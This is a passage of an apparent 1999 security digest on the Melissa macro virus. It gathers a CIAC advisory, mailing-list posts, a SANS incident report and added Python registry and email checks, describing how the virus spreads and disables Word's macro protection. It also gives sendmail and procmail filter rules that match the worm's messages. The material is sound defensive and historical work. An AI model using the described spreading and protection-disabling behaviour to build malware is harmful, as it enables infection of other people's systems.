Document_Open macro that runs whenever a document is opened. After the 
Normal.dot template is infected, the virus infects every document you work 
on as soon as you close them. If you share these documents with anyone, you 
will spread the virus.

Finally, if the minute of the hour equals the day of the month, the virus 
inserts the following message at the current location in the active document.

  Twenty-two points, plus triple-word-score, plus fifty points for using 
  all my letters.  Game's over.  I'm outta here.

Detecting The Virus
===================

Several antivirus vendors have a detection and cleaning capability for this 
virus; however, you must go to the vendor's web site to get the scanner 
updates. Scanners with automatic or live update features do not yet get the
update required to find and clean this virus. While we expect the detection
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
does detect the virus; the current live update does not. We have reliable
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp) and
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)
also have detection capabilities.

If you receive an e-mail with the following subject and body, DO NOT OPEN the 
attachment. 

Subject: 
  Important Message From <username>
Body: 
  Here is that document you asked for ... don't show anyone else ;-)

Make sure the sender is someone you know and then ask them if they really 
sent you the attachment before opening it. If they did not send it, do not 
open the attachment and contact your computer security manager. The most 
common name for the attached file is list1.doc but that name can change.

If the following text appears in a document without your putting it there, 
your normal.dot template is infected and your Word program is infecting all 
documents when you close them.

  Twenty-two points, plus triple-word-score, plus fifty points for using 
  all my letters.  Game's over.  I'm outta here.


Another option to see if a system has been infected is to use Regedit and 
search for the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that key exists and has the value "... by Kwyjibo" the system has been 
infected at some time. Note that the infection may have been removed without 
deleting the key. This key can be deleted, but does no damage if left alone.
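
The Regedit search above can be scripted against a Regedit export so the same
check can be run across many machines. The following Python is an added
example; it is not part of the CIAC advisory or of the virus code, and the
.reg text it parses is constructed for the example. The advisory gives the
marker as the key path ...\Office\Melissa?; the macro source posted further
down this digest writes the Word 2000 Security Level with a
PrivateProfileString call of the same shape (a value named "Level" under the
Security key), so the marker may show up in an export as a value named
"Melissa?" under the Office key rather than as a subkey. The check therefore
accepts both shapes, and also reports a Word 2000 Security Level of 1, the
value that macro source shows being written.

```python
import re

# Constructed Regedit export from a machine that had been infected; sample
# text for this example, not data taken from a real system.
INFECTED_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Melissa?"="... by Kwyjibo"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001
"""

# Constructed export from a clean machine (no marker, Level not set to 1).
CLEAN_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000003
"""

OFFICE_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "Melissa?"
MARKER_DATA = "... by Kwyjibo"
SECURITY_KEY = OFFICE_KEY + r"\9.0\Word\Security"

_KEY_LINE = re.compile(r"^\[(.+)\]$")
_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unquote(s):
    """Strip the surrounding quotes of a .reg string and undo backslash escapes."""
    return re.sub(r"\\(.)", r"\1", s[1:-1])


def parse_reg_export(text):
    """Parse a Regedit export into {key_path: {value_name: data}}.

    A key's default value is stored under the name "@".  Only the two data
    syntaxes this check needs are decoded, "string" and dword:hex; any other
    right-hand side is kept as raw text.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT")):
            continue
        m = _KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if current is None or not m:
            continue
        name = "@" if m.group(1) == "@" else _unquote(m.group(1))
        rhs = m.group(2)
        if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            data = _unquote(rhs)
        elif rhs.startswith("dword:"):
            data = int(rhs[len("dword:"):], 16)
        else:
            data = rhs
        keys[current][name] = data
    return keys


def find_melissa_marker(keys):
    """Return the marker data if present in either shape, else None."""
    # Shape 1: a value named "Melissa?" under the Office key.
    data = keys.get(OFFICE_KEY, {}).get(MARKER_NAME)
    if data is None:
        # Shape 2: a subkey named "Melissa?" whose default value holds the text,
        # which is how the advisory spells the path.
        data = keys.get(OFFICE_KEY + "\\" + MARKER_NAME, {}).get("@")
    return data


def assess(text):
    """Return a list of findings for one exported hive; an empty list means clean."""
    keys = parse_reg_export(text)
    findings = []
    marker = find_melissa_marker(keys)
    if marker == MARKER_DATA:
        findings.append("Melissa marker present: system was infected at some time")
    elif marker is not None:
        findings.append("Melissa? entry present with unexpected data %r" % (marker,))
    level = keys.get(SECURITY_KEY, {}).get("Level")
    if level == 1:
        findings.append("Word 2000 macro security Level is 1, the value the macro writes")
    return findings


if __name__ == "__main__":
    for label, text in (("infected", INFECTED_REG_EXPORT), ("clean", CLEAN_REG_EXPORT)):
        print(label, assess(text) or ["no findings"])
```

As the advisory notes, the marker only says the system was infected at some
time; a clean scanner result with the marker still present is consistent with
an infection that was removed without deleting the key.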

Protecting A System
===================

The first step in protecting a system is to have a current antivirus package 
running on your system. Be sure to update it at least once a month. Many of
the newer antivirus scanners have the capability to automatically update
themselves every couple of weeks. 

To protect Word from this and other Word macro viruses, first ensure that Word
has been patched with the Word 97 Template vulnerability patch 
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the 
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled. 

  Confirm conversions at open.
  Macro virus protection.
  Prompt to save Normal template.

Password Protecting The Normal.dot File
---------------------------------------

To password protect the Normal.dot file in Word 97, perform these steps:

1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice. 
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.

The next time you start Word, the normal.dot template will be protected. 

WARNING: If you ever have to type in the password to make changes to the 
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it. 

Turning On Macro Virus Protection and Other Options
---------------------------------------------------

Some simple macro virus protection is built into Word 97. It does not detect 
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not 
necessarily a virus. However, if you are alerted to a macro attached to a 
document you should be extremely wary because most people do not have macros
attached to their documents. 

Other options to set are: 

  Confirm conversions at open. This makes Word display a dialog box if 
    it is converting a document from one format to another.

  Prompt to save Normal template. This makes Word display a dialog box 
    asking you to confirm changes to the Normal.dot template. Most 
    macro viruses hide in Normal.dot so this lets you know that there 
    has been a change that you may want to prevent. Changes also occur 
    when you change the default font or one of the built-in styles.


To turn on macro virus protection and these other options, perform these
steps:

1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
7. Close the dialog box.

Whenever you open a document that contains macros, the macro virus protection 
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open 
the document without the macros, or cancel the open operation. You should  
only open a document with macros enabled if you are expecting there to be 
macros on that document and you know what they are supposed to do.

Detecting the Virus With a Mail Server
======================================

If a site has been infected you may need to block the virus infected mail 
messages with your mail servers. The following filter was written by Scott 
Hutton (Lead Security Engineer, Information Technology Security Office) of 
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block 
messages that do not contain the virus. Use this filter at your own 
discretion. 

===== start included text ======
We blocked this on our mail relays through the following additions to
the sendmail.cf:

  HSubject: $>CheckSubject
  SCheckSubject
  RImportant Message From $+    $#error $: 553 Subject Error
  R$*                           $@ OK

Don't forget that there are tabs before $#error and $@ OK.  This will
block any message where the subject begins with "Important Message
From ...", which may be too rash of an action at your site.

===== end included text ======

Another filter was obtained by the CERT team from Nick Christenson of 
sendmail.com

ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail 
filter. Thanks to CERT and Nick Christenson of sendmail.com for another 
sendmail filter.
_____________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

   World Wide Web:      http://www.ciac.org/
                        (or http://ciac.llnl.gov -- they're the same machine)
   Anonymous FTP:       ftp.ciac.org
                        (or ciac.llnl.gov -- they're the same machine)
   Modem access:        +1 (925) 423-4753 (28.8K baud)
                        +1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
   information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
   (SPI) software updates, new features, distribution and
   availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
   use of SPI products.

Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:

E-mail to       ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
        subscribe list-name 
  e.g., subscribe ciac-bulletin 

You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email.  This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-026: HP-UX rpc.pcnfsd Vulnerability
J-027: Digital Unix Vulnerabilities (at, inc)
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.2

iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST)
From: Greg A. Woods <woods@most.weird.com>
Reply-To: Phil-Sec@datasys.net
To: Phil-Sec@datasys.net
Subject: RE: Phil-Sec: `Good Times', come to life: Melissa

[ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ]
> Subject: RE: Phil-Sec: `Good Times', come to life: Melissa
>
> Good points. But WinWord can be configured to require confirmation
> before executing a macro.  This is an area where user education is
> critical...

The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open.  According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute.  This is absurdly stupid.

(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler brethren, so to speak.)

-- 
                                                        Greg A. Woods

+1 416 218-0098      VE3TCP      <gwoods@acm.org>      <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 21:58:17 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Malicious code detection and full disclosure

I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday.  There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:

1.  "Posting the source allows someone to know how to write a Macro virus"

Yes, and anyone of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source.  Repeat after me:
"Word macros are INTERPRETED".  All symbol information is present.  No
decompilation necessary.

2.  "By reformatting the source, you have created a new variant"

What?  Your virus scanner could be thwarted by adding whitespace?  Someone
has a problem but it isn't me.  Perhaps you'd best learn from the sandbox
mechanisms of Java or virus scanners like F-PROT.  A virus is not a virus
because it has the string "By 3le3t3 DudEZ" followed by three tabs.  It is
a virus because it does things like update Normal.dot.  Repeat after me:
"Pattern matching alone does not a virus scanner make".  Just as in the
recent thread about security scanners doing version-checking instead of
exploiting a hole, the best answer is to use a combination of techniques
to identify flaws or malicious code and then notify the user of any
uncertainties in the detection mechanism.

A perfect parallel to this is the Internet worm.  We were reminded of that
time as we paused the Exchange SMTP service to keep the program from
spreading.  Also, it was important to quickly analyze the program, making
sure it did nothing malicious like mailing a person's files to another
location.  After doing this, I believed the code itself would help others
do the same if they needed to.  An important note is that the Symantec and
McAfee web pages describing the virus both left out important information
(for instance, avertlabs.com neglected to mention the active document and
Normal.dot file infection).  If I had made any mistakes in my analysis,
another could have determined this for himself.

A good reference is the paper "With Microscope and Tweezers, An Analysis
of the Internet Worm" by Mark Eichin and Jon Rochlis.  It can be found at:

    http://www.mit.edu:8001/people/eichin/www/virus/main.html

In short, this is the same full disclosure vs. security through obscurity
debate.  Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade.  Viruses tend to be
uninventive and boring.  This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread.  I only got
involved because I had to help fend off the nuisance Friday.  I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.

-Nate

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 20:12:22 -0800
From: John D. Hardin <jhardin@wolfenet.com>
To: BUGTRAQ@netspace.org
Subject: Re: Blocking the Melissa Trojan

On Sat, 27 Mar 1999, Brett Glass wrote:

>At 03:28 PM 3/27/99 -0800, John D. Hardin wrote:
>>On Sat, 27 Mar 1999, Brett Glass wrote:
>>
>>> Excellent. Is there a default "poisoned executables" file in the
>>> package? Or do admins have to construct a list themselves?
>>
>>They have to make it themselves if they wish to use the facility. The
>>web page has a suggested list of filenames.
>
> Sounds good. Now, for the next twist to the story.
>
> It turns out that the Melissa code also infects NORMAL.DOT, so that
> the computer starts producing infected documents. When one of those
> documents hits a machine that hasn't been infected yet, that machine
> sends out a barrage of e-mail.... Using the NEW document as the
> attachment! It'll have a different name.  So, we also need to filter
> by subject and body.

That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)

Per Aleph1:
 The subject line is "important Message From <some user name>". The
 body consist of the text "Here is that document you asked for...
 don't show anyone else;-)".

That's fairly simple...

:0 H
* ^Subject:.*important Message From
{
  :0 B
  * Here is that document you asked for
  * don't show anyone else
  * ^Content-.*: .*\.do[ct]
  {
    LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '

    :0
    security-quarantine
  }
}

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  In the Lion
  the Mighty Lion
  the Zebra sleeps tonight...
  Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
   52 days until Star Wars episode I
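
Both filters on this page key on fixed strings: the sendmail rules in the CIAC
advisory on the subject alone, and the procmail recipe above on the subject,
the two body phrases and a .doc/.dot attachment. The following Python is an
added example, not the CIAC, Scott Hutton's or John Hardin's code; it applies
the same strings from the page to constructed sample messages so the
difference in false positives between the two approaches can be seen. The
subject prefix, body phrases and filename pattern are the ones quoted on the
page; matching is case-insensitive because the subject appears here both as
"important Message From" and "Important Message From". The sample messages
and the "suspect-subject" outcome are constructed for the example.

```python
import email
import re
from email import policy

# Strings quoted on this page: the subject prefix the sendmail rule rejects on,
# the two body phrases the procmail recipe requires, and its .do[ct] pattern.
SUBJECT_RE = re.compile(r"^Important Message From", re.IGNORECASE)
BODY_PHRASES = ("Here is that document you asked for", "don't show anyone else")
DOC_NAME_RE = re.compile(r"\.do[ct]$", re.IGNORECASE)

# Constructed sample messages (not real captures).
WORM_MESSAGE = """\
From: jane.doe@example.com
To: bob@example.com
Subject: Important Message From Jane Doe
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="bnd"

--bnd
Content-Type: text/plain; charset="us-ascii"

Here is that document you asked for ... don't show anyone else ;-)

--bnd
Content-Type: application/msword; name="list1.doc"
Content-Disposition: attachment; filename="list1.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--bnd--
"""

BENIGN_MESSAGE = """\
From: ceo@example.com
To: staff@example.com
Subject: Important Message From the CEO
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

All-hands meeting moved to 3pm.
"""

UNRELATED_MESSAGE = """\
From: alice@example.com
To: bob@example.com
Subject: Lunch?
Content-Type: text/plain; charset="us-ascii"

Noon?
"""


def subject_only_match(msg):
    """What the sendmail rule does: decide on the Subject: prefix alone."""
    return bool(SUBJECT_RE.match(msg["subject"] or ""))


def classify(raw):
    """Return 'reject', 'suspect-subject' or 'ok' for one RFC 822 message.

    'reject' needs the subject prefix, both body phrases and a .doc/.dot
    attachment, like the procmail recipe.  'suspect-subject' marks mail the
    subject-only sendmail rule would have bounced but the fuller check did not.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    if not subject_only_match(msg):
        return "ok"
    body = ""
    has_doc = False
    for part in msg.walk():
        filename = part.get_filename()  # Content-Disposition or Content-Type name
        if filename and DOC_NAME_RE.search(filename):
            has_doc = True
        elif part.get_content_type() == "text/plain":
            body += part.get_content()
    if has_doc and all(phrase in body for phrase in BODY_PHRASES):
        return "reject"
    return "suspect-subject"


if __name__ == "__main__":
    for label, raw in (("worm", WORM_MESSAGE), ("benign", BENIGN_MESSAGE),
                       ("unrelated", UNRELATED_MESSAGE)):
        print(label, classify(raw))
```

The "suspect-subject" outcome is exactly the class of mail Scott Hutton warns
about: the sendmail rule bounces it with a 553, while the fuller check lets
it through. A site that wants the simpler rule's coverage without bouncing
legitimate mail can route that class to a quarantine folder, as the procmail
recipe does for its matches, rather than rejecting it outright.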

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:16:29 +0000
From: Vesselin Bontchev <bontchev@COMPLEX.IS>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

Aaron Wood writes (my comments are on Trend's press release forwarded by
him):

> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.

In Word 2000, the virus disables the Tools/Macro/Security menu.

> The name of the original infected attachment was List.doc, but it
> could be any name.

Theoretically, yes. But keep in mind that the virus sends itself by
e-mail only when it infects a clean system. What it sends is the
document which has infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).

> If the user does not have Outlook, the virus will not work.

That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)

Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.

> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.

"File" here means "whatever is not infected - either the active document
or the normal template".

> Trend Micro has detection for this virus in its latest pattern update,

Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:

        ftp://ftp.complex.is/pub/macrdef2.zip

Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
Postholf 7180, IS-127, Reykjavik, Iceland               producers of F-PROT.
e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44  E5 F7 C3 18 EA 2B AE 4E

----------------------------------------------------------------------------

Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST)
From: sans@clark.net
Subject: EXTRA: SANS Flash Report on the Melissa Virus

Once or twice a year, the magnitude of a security event is great enough
to merit a SANS Flash Report.  It is amazing and coincidental that it
happens in the same 24 hour period that we send out the first SANS
Newsbites.

NOTE:  SANS will be changing email and web servers this week.  We hope
to avoid service interruptions, but some error might creep in.  Problems
to <kolstad@delos.com>.

Table of Contents:
  1.  What Melissa teaches us
  1.1 Infection Speed
  1.2 Collateral Damage
  1.3 Need for Defense in Depth
  2.  One site's experience in cleaning up after a Melissa infestation
  3.  Conclusion
  Appendix: Melissa Source Code

You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University.  This document is available
at:  http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .

The major anti-virus vendors have already released descriptions and
anti-viral signatures.  URLs for NAI and Symantec are listed below:
 http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
 http://www.symantec.com/avcenter/venc/data/mailissa.html

The rapid response of these organizations has been very impressive, and
your response should be equally rapid.  If you have not yet taken the
steps described in the CERT advisory, follow the instructions referenced
above and get your site's virus signatures updated and the infected
machines contained and cleaned.  Then read the rest of this document
that tells some of the lessons learned and also the bigger picture
surrounding the Melissa Macro virus.  We discuss the implications of
information gathering viruses like Melissa, the process and impact of
cleaning up after an outbreak at a military site and finally, share a
non-working version of the code to help you understand what these viruses
do.

1. What Melissa teaches us

1.1 Infection Speed

According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
from a large number of Department of Defense and Department of Energy
sites.  Many of you will probably find out today that your site has been
infected as well.  This serves as a warning how fast a virus with an
unknown signature can spread.  A modified, non-operative copy of the
source code is included as an appendix to this document.  If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book.  Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.

Useful Background Information: In the March 2nd SANS First Tuesday
Intrusion Detection Web Broadcast, archived at
http://www.sans.org/webarchives.htm, Stephen Northcutt described another
MS Word Macro Virus, M97.Marker.a.  Marker is an information gathering
virus which uses FTP to send the Microsoft Office registration information
of infected systems to outside organizations.  Northcutt described how
this same technique would allow a prospective attacker to develop an
infection map and by knowing who sends what to whom, to target future
attacks.

1.2 Collateral Damage

The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files.  However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars.  It also directly affects sites' ability to send and receive
email.  One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong.  I could feel the network going
slower and slower.  As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard.  The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application.  The subject line read:
"Important Message From [Jane Doe]".  I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was
expecting a couple of them from other people.  It wasn't inconceivable
to think that she had become involved, even though I didn't know who
she was.  I double-clicked on the Word document. A pop-up window appeared,
warning me that a macro was contained in the document, and that macros
can potentially be dangerous.  I knew that... :-)  So, I shut down the
Word application, and checked the document with several of the virus
detection packages that I had.  Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted
source, I went ahead and opened the document with the macros enabled.
In less than a second, a duplicate of the message had hit my mailbox,
this time with my name attached. I hit the power-off button on my
computer, but it was late.  The payload had been delivered.  My name
was now attached to a file containing pornographic web sites, and an
apparent username and password for each site.  Moments later, duplicate
messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This
virus (or worm) was snowballing fast, too fast.  I immediately called
our information systems security manager, only to find that his phone
was already busy.  I left a voicemail detailing my appraisal of the
situation, and my fear that this incident could get serious... very
quickly.  What I didn't know was that I was too late, it was already
*very* serious."

1.3 Need for Defense in Depth

Though Melissa is primarily spread by e-mail, passing an infected floppy
disk works just as well to move the virus to a new system, possibly even
a new organization.  If there was ever any doubt about whether we need
to take virus countermeasures seriously, that time is past.  We recommend
virus scanning at the firewall, on servers, and on the desktop systems
as well as physical entry points for magnetic media for sites that want
to avoid the kind of punch Melissa exhibited.

2. One site's experience in cleaning up after a Melissa infestation

Here's a first-person description of the process one site used to clean
up after being hit by Melissa.

"As soon as we discovered the virus late Friday afternoon, we disconnected
our servers (all SMTP relays and Exchange servers at our Internet
connection) from the network until we could contain the infection. This
happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange
servers worked through Friday night and well into Saturday. Many returned
Saturday and again on Sunday to complete the isolation and cleanup. They
cleaned up the Exchange servers with updated anti-viral signatures as
soon as they were available. The corporate servers and one departmental
server were ready to come back on-line late Sunday. We left IMS (Internet
Mail Service) disabled until we could contain (filter) email at the SMTP
server.

"Our version of sendmail is one removed from the latest and filter
updates provided by the author would not work on our version. We resorted
to getting the word out for ALL users to update the AV signatures and
refrain from sending Word docs until any with macros had been identified
as coming from trusted sources. The administrator for the SMTP relay
host downloaded a trial version of InterScan VirusWall from TrendMicro.
For more info, see:  http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
  (approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
  problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
  in incident handling based on the SANS' Incident Handling Step by Step
  approach.
* The person who needed to make key decisions was trained in incident
  response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
  the Incident Handling team by not directing what needed to be done (at
  least so far)."

Note: The stages of incident handling are: preparation, identification,
containment, eradication, and follow-up.  The URLs at the beginning of
this document can help you with identification and eradication.  Your
organization may need to consider email server down time in order to
achieve containment.  You may also want to consider setting up non-email
communication channels for your organization.  If you do not know how
to build a telephone call tree, look for a "soccer mom".  They know how
to spread important information very efficiently.  In this way, if you
do suffer an email meltdown, you can still get important information,
such as where to acquire the latest anti-virus software, to your users.

3. Conclusion

Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness.  That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
    systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
    from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
    when they call about a security threat.

In addition, we at SANS want to hear your experiences and the lessons
you learned in responding to Melissa. Please send your Melissa-related
tips, tricks, techniques, experiences and lessons learned to info@sans.org
with Melissa in the subject line.  This type of sharing can help all
sites be in a better position to respond the next time an event like
this occurs.

Appendix: Melissa Source Code

